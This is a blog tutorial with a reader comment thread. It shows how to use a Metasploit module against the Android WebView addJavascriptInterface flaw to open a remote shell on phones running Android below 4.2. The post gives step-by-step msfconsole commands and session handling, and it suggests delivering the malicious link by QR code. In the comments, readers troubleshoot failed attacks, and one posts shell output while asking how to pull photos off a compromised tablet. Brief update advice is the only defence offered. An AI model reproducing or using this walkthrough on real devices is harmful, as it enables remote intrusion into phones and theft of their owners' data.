Around 70% of all Android devices in the field are subject to a Javascript exploit that could allow an attacker remote access to your phone by doing nothing more than surfing to a malicious page or scanning in a malicious QR Code.
Called the “Android WebView addJavascriptInterface Vulnerability”, it works when untrusted Javascript code is executed by a WebView on Android devices.
And here is the kicker, about 70% of Android devices (phones and tablets) are vulnerable to it!
This month Rapid7 added the exploit as a Metasploit Module, so let’s take a look at it using Kali Linux and Metasploit:
1. Run Metasploit from the Kali Menu, or type “msfconsole” at a terminal prompt.
2. Type, “use exploit /android/browser/webview_addjavascriptinterface”.
3. Then type, “show options” to see what needs to be set:
For the most part, you are good to go. You can turn on SSL if you want, change the port or host address if you want. But one variable I did change was URIPATH. By default it is random, so I changed it to something easier to type in.
“Security” sounded reassuring.
4. Enter, “set URIPATH Security”:
5. Finally, type “exploit”:
A server is started on the Kali system that hosts a webpage containing the exploit. A URL is provided including the URI path.
Now if a vulnerable Android device surfs to our Metasploit module, sitting at 192.168.1.16:8080/Security in this demo, you get a remote session:
Now just connect to the session using “sessions -i 1”:
And that is it! You are connected to the Android device.
But on one Android Tablet that I tested, something didn’t seem right. It allowed me to run some Linux commands but not others. I could use “pwd” to see the current directory that I was in, and I could surf to other directories with “cd”, but the “ls” and other commands would not work:
Whenever I ran “ls”, to view the files in the directory, I would get a “<stdin>[2]: ls: not found” error.
A quick check of the path with “echo path” revealed that no path was set:
So I set it by typing, “export PATH=/system/bin:$PATH”:
Once the path was correctly set to point to the system files, “ls” and other commands worked without issue:
As you can see, I had a complete remote shell to the Android device.
All I had to do was visit a malicious page using the built in Browser and the exploit ran with no further warning or input from the Android device. To make matters worse, the URL could be printed as a QR Code so that once it is scanned, it automatically goes to the malicious page for true “click and pwn”.
So what can you do to protect yourself against this type of attack?
The exploit only works on versions of Android < 4.2. Which apparently is 70% of current devices…
Update your device to the latest version of Android (if it will update), check with your manufacturer for instructions.
Also, never scan in QR Codes from unknown sources.
But I did notice that one device I tested wasn’t 4.2, it was a 4.0 version – and it was not vulnerable. But I remembered that the Android Browser did have an update that I downloaded before testing.
Not sure if this will be true for all devices, again the best course of action would be to update to the latest OS version.
Want to learn a lot more about Kali Linux and Metasploit? Check out my new book, “Basic Security Testing with Kali Linux“.
hi … what was your browser name?
For this I just used the built in Android Browser.
I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas?
Are you running Kali in a Virtual Machine? I have seen the Anti-Virus/ firewall running on a Virtual Machine catch and block several of the exploits.
I am! This was running in an Oracle VirtualBox VM. Thanks for the feedback; I’ll try this from a native install tonight.
Hello again! I’m trying to get this working for a project for graduate school, and I’m still hitting difficulties. I’ll let you know what I’ve done in case I’ve missed a dependency somewhere.
1) Loaded Kali Linux from a Live CD (Not a VM this time).
2) Copied the Ruby code from Rapid 7’s website into /root/.msf4/modules/exploits/android/browser/webview_addjavascriptinterface.rb
3) Loaded Applications–> Kali Linux–> System Services–> Metasploit–> community / pro start
4) In a terminal, loaded msfconsole
5) followed your guide to “use exploit/android/browser/webview_addjavascriptinterface” and set URIPATH
6) Navigated to this site from a vulnerable phone.
The phone redirects to /Security/(random string) and metasploit shows “Gathering target information” and “Serving exploit HTML”, but still, no connection/session is ever made. Any guidance would be appreciated? I appreciate the help! My next step may be to load an older ROM on the device in case Moto/Verizon silently released a patch somehow.
The phone is a Verizon Droid RAZR MAXX OS 4.1.2.
I’ve also tried using a TMobile HTC MyTouch (OS: 2.3.4) but this may be too out of date.
It is in the newer versions of Metasploit so you really don’t need to download the code from Rapid7. Just type “msfupdate” and it should pull down the latest exploits and updates for Metasploit. Maybe it needs something else in the updates to function? But your target system might have been patched for the exploit. I have a Kyocera phone that should be vulnerable by OS Version, but the Browser was patched so it isn’t.
Can you confirm if this would also work from a WIndows installation of metasploit?
I followed you guide, but used it from a Windows installed. I get to the part where my Android unit creates a session with the console I connect to that console number to interact, however, nothing happens after that.
I enter commands and get no return to the console. Is there any ideas that you can pass my way?
This is the last thing the console shows…
GET /lolcat HTTP/1.1
Host: 192.168.1.137:4444
Connection: keep-alive
Referer: http://goo.gl/
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-us; KENWOOD DNN 2013 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept-Encoding: gzip,deflate
Accept-Language: en-US
Accept-Charset: utf-8, iso-8859-1, utf-16, *;q=0.7
As an update to this, I can answer my own question. The answer is yes – the exploit works in Windows and Linux.
However, all of the devices and ADV builds (4.0, 4.03, 4.2 etc) all do the same thing – the final log in Metasploit is “Serving exploit HTML” followed by nothing.
Can anyone confirm if they were able to get this exploit to work in ADV with any android 4.x images?
Hello
I have the same problem. If i work with the sdk emulator there is all right. I tested it with an real smartphone and had the same problems like chris.
I actually couldn’t get it working with a couple emulators, but got it working on about 50% of the Android devices I have tested so far – Phones and tablets. It is odd though, some devices that should be vulnerable by Android version number didn’t seem to be.
Hi
I have an access to the tablet! I can read the devices and can run some shell commands. But when i want to steal a picture with
dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
i get the response /dev/sdc: cannot open for write: Permission denied
At Kali Linux i use the exploit webview_addjavascriptinterface and get a response from my tablet (same WLAN).
msf exploit(webview_addjavascriptinterface) > [*] 192.168.178.23 webview_addjavascriptinterface – Gathering target information.
[*] 192.168.178.23 webview_addjavascriptinterface – Sending response HTML.
[*] 192.168.178.23 webview_addjavascriptinterface – Serving exploit HTML
[*] Command shell session 1 opened (192.168.178.39:35534 -> 192.168.178.23:8080) at 2014-05-16 11:27:41 +0000
msf exploit(webview_addjavascriptinterface) > sessions -i 1
[*] Starting interaction with 1…
export PATH=/system/bin:$PATH
ls -al
drwxr-xr-x root root 2014-05-15 16:56 acct
-rw-r–r– root root 332 2014-05-15 16:56 boot.txt
drwxrwx–x system cache 2014-05-10 09:22 cache
dr-x—— root root 2014-05-15 16:56 config
lrwxrwxrwx root root 2014-05-15 16:56 d -> /sys/kernel/debug
drwxrwx–x system system 2014-05-12 09:41 data
-rw-r–r– root root 129 2014-05-15 16:56 default.prop
drwxr-xr-x root root 2014-05-15 17:12 dev
drwxr-xr-x radio radio 2014-05-09 13:55 efs
lrwxrwxrwx root root 2014-05-15 16:56 emmc -> /storage/sdcard1
lrwxrwxrwx root root 2014-05-15 16:56 etc -> /system/etc
-rwxr-x— root root 105292 2014-05-15 16:56 init
-rwxr-x— root root 1107 2014-05-15 16:56 init.cm.rc
-rwxr-x— root root 2344 2014-05-15 16:56 init.goldfish.rc
-rwxr-x— root root 5171 2014-05-15 16:56 init.p1-common.rc
-rwxr-x— root root 5389 2014-05-15 16:56 init.p1.rc
-rwxr-x— root root 936 2014-05-15 16:56 init.p1.usb.rc
-rwxr-x— root root 17862 2014-05-15 16:56 init.rc
-rwxr-x— root root 1637 2014-05-15 16:56 init.trace.rc
-rwxr-x— root root 3915 2014-05-15 16:56 init.usb.rc
-rw-r–r– root root 1664 2014-05-15 16:56 lpm.rc
drwxrwxr-x root system 2014-05-15 16:56 mnt
dr-xr-xr-x root root 1970-01-01 00:00 proc
drwxr-xr-x root root 2014-05-09 13:55 radio
drwxr-x— root root 2014-05-15 16:56 sbin
lrwxrwxrwx root root 2014-05-15 16:56 sdcard -> /storage/sdcard0
d—r-x— system sdcard_r 2014-05-15 16:56 storage
drwxr-xr-x root root 2014-05-15 16:56 sys
drwxr-xr-x root root 2014-05-09 13:56 system
-rw-r–r– root root 272 2014-05-15 16:56 ueventd.goldfish.rc
-rw-r–r– root root 2035 2014-05-15 16:56 ueventd.p1.rc
-rw-r–r– root root 5075 2014-05-15 16:56 ueventd.rc
lrwxrwxrwx root root 2014-05-15 16:56 vendor -> /system/vendor
I want to copy some pictures to my KALI system but there is the problem:
dd if=/sdcard/DCIM/Camera of=/dev/sdc bs=1M
/dev/sdc: cannot open for write: Permission denied
Or i want to run adb (no device!)
adb devices
* daemon not running. starting it now on port 5038 *
* daemon started successfully *
List of devices attached
Is the phone rooted? If the phone is not rooted, there are several areas that you will not be able to access. For those who root their phone, it is pretty much one of the last lines of defense that you are removing.
The phone is rooted ….. do you have an other idea? I can’t also download any files from the phone to my Desktop but i can delete folders etc. at the phone
Have you tried the “get” command?
I’m attempting to run this in Kali Linux, and when my browser (Android 4.1.2) connects, Kali goes through the steps: “Gathering target information” and “Serving exploit HTML”, but no connection/session is ever made. I have tried this from multiple phones running Android 4.1.2 and cannot get the session to create. Any ideas? The OS don’t run in the VM.
Not sure, according to Rapid7 the Browser app in 4.1.2 specifically is known to be vulnerable (http://www.rapid7.com/db/modules/exploit/android/browser/webview_addjavascriptinterface). Could be that the browser app was updated on the phones that you have tried. One I tried that should have been vulnerable was not, but I did remember seeing a browser app update available that I installed a few days before I tried the exploit on it.
There are other apps that use Webview that should be vulnerable but I have yet to find a list of them.